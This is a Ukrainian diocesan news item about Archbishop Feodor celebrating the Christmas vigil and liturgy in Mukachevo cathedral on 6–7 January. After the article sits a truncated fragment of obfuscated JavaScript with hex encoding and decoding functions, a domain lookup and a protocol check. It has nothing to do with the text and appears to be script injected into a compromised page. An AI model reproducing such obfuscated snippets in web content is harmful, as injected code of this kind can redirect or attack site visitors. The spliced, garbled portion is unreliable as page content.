Владика Феодор звершив Різдвяне богослужіння в Мукачівському кафедральному соборі

6 січня напередодні Різдва Христового, керуючий єпархією Високопреосвященніший Феодор, архієпископ Мукачівський і Ужгородський звершив нічне Всенічне богослужіння в Мукачівському кафедральному соборі на честь ікони Божої Матері «Почаївської».

Після богослужіння владика призвав на усіх Боже благословення та привітав з великим святом.

А вже зранку в день Різдва Христового, 7 січня, о 10.00, архієпископ Феодор звершив святкове архієрейське богослужіння в тому ж кафедральному соборі Мукачева.

Архіпастирю співслужило духовенство собору. Після Літургії священнослужителі колядками привітали усіх присутніх з Різдвом Христовим.

У свою чергу, владика Феодор звернувся до пастви зі словом настанови, в якому зазначив важливість події народження Бога на землі та зупинився на темі миру в Різдві Христа.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “m-church.org.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Цей сайт використовує Akismet для зменшення спаму. Дізнайтеся, як обробляються ваші дані коментарів.